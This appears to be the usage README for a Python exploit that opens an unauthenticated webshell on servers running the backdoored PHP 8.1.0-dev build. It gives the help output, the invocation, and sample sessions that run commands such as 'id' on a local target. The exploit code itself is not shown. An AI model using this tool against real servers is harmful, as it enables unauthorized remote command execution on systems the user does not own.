Exploit Code for PHP 8.1.0-dev WebShell RCE (Unauthenticated)
Expected outcome: Exploiting backdoor installed on PHP 8.1.0-dev server thereby obtaining WebShell to execute commands remotely.
Intended only for educational and testing in corporate environments.
This Exploit was tested on Python 3.8.6
cfx: ~/Documents/
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL]
PHP 8.1.0-dev WebShell RCE by ColdFusionX
optional arguments:
-h, --help show this help message and exit
-l URL, --url URL PHP 8.1.0-dev Target URL(Example: http://127.0.0.1)
Exploit Usage :
./exploit.py -l http://127.0.0.1
[^] WebShell=- id
OR
[^] WebShell=- whoami
This exploit expects single arguments to run initially :
- -l : PHP 8.1.0-dev Target URL
- Scenario 1 : Valid Vulnerable target
cfx: ~/Documents/
→ ./exploit.py -l http://127.0.0.1
[+] PHP 8.1.0-dev WebShell RCE by ColdFusionX
Target is running on PHP 8.1.0-dev
*Shoot your commands below*
[^] WebShell=- id
uid=1000(cfx) gid=1000(cfx) groups=1000(cfx)
[^] WebShell=- hostname
shockwave
[^] WebShell=- ^C
Exiting.
- Scenario 2 : Invalid Target
cfx: ~/Documents/
→ ./exploit.py -l http://127.0.0.1
[+] PHP 8.1.0-dev WebShell RCE by ColdFusionX
Invalid URL or Target Not Vulnerable